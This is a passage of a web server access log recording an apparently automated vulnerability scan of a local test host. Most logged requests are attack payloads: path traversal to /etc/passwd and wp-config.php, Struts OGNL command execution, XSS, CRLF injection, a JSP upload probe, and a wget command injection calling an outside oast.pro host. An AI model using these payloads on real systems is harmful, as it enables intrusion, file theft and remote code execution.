+0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_advertising&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"{\x22name\x22:\x22admin\x22,\x22password\x22:\x22admin\x22,\x22checkbox\x22:false}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /login/system HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5c..0x5cwindows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //wp-admin/options-general.php/%22%3E%3C/script%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E/script%3E?page=securimage-wp-options%2F HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /auth/realms/master/protocol/openid-connect/auth?scope=openid&response_type=code&redirect_uri=valid&state=cfx&nonce=cfx&client_id=security-admin-console&request_uri=http://ca28bc0smpvbbtig07h0qkzeod9fc7ikg.oast.pro/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?script=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /iPages/i_login.asp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /.%00./.%00./etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.003","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wfc/portal HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /common/download/resource?resource=/profile/../../../../Windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/amministrazione-aperta/wpgov/dispatcher.php?open=../../../../../../../../../../etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /./../../../../../../../../../../windows/win.ini HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /script/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /src/login.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2762.73 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/themes/oxygen-theme/download.php?file=../../../wp-config.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php/bbs/index/download?url=/etc/passwd&name=1.txt&local=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /webmail/old/calendar/minimizer/index.php?style=...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2f...%2f.%2fetc%2fpasswd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?action=command&command=set_city_timezone&value=$(wget%20http://ca28bc0smpvbbtig07h0t318yicwqxr4s.oast.pro)) HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /language/lang HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"http://127.0.0.1", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_photobattle&view=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.033","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://example.com/https://example.com/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?option=com_jukebox&controller=../../../../../../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 6.4; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:07 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /cgi-bin/tsaupload.cgi?file_name=../../../../../..//etc/passwd&password= HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /elfinder.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/.%252e/windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.tugboat HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /keycloak.json HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2919.83 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /stats/summary HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/_samples/default.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /tests/generate.php HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install/ HTTP/1.1","status":"200","body_bytes_sents":"5335","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /~user/%0D%0ASet-Cookie:crlfinjection HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"GET /cgi-bin/.%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"------WebKitFormBoundaryFy3iNVBftjP6IOwo\x0D\x0AContent-Disposition: form-data; name=\x22file\x22; filename=\x22poc.jsp\x22\x0D\x0AContent-Type: application/octet-stream\x0D\x0A\x0D\x0A<%out.print(2be8e556fee1a876f10fa086979b8c7c);%>\x0D\x0A------WebKitFormBoundaryFy3iNVBftjP6IOwo--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /page/exportImport/uploadOperation.jsp HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?action:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https://www.%5C.example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.drone.yml HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 4.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /?author=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./.%5C%5C./windows/win.ini HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?q=file:///etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /install.php?profile=default HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-login.php?wlcms-action=preview HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.030","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/4E423F", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fckeditor/editor/filemanager/connectors/uploadtest.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"-","request":"POST /cgi-bin/.%2e/%2e%2e/%2e%2e/bin/sh HTTP/1.1","status":"400","body_bytes_sents":"154","req_time":"0.001","http_user_agent":"-", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-----------------------------154934846911423734231554128137\x0D\x0AContent-Disposition: form-data; name=\x22upload\x22; filename=\x2229KBxiBtCc8f4TfsC9DCltSSfqN.php\x22\x0D\x0AContent-Type: application/x-php\x0D\x0A\x0D\x0A\x0D\x0A\x0D\x0A-----------------------------154934846911423734231554128137--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /clients/editclient.php?id=29KBxiBtCc8f4TfsC9DCltSSfqN&action=update HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /portal/webclient/index.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /page/exportImport/fileTransfer/poc.jsp HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.action?redirectAction:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'sh','-c','id'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()} HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /https:/%5C/%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /manager/html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /Default.aspx?pid=Login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:05:36:08 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /login.php?mid=0&usr=admin%27%3e%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 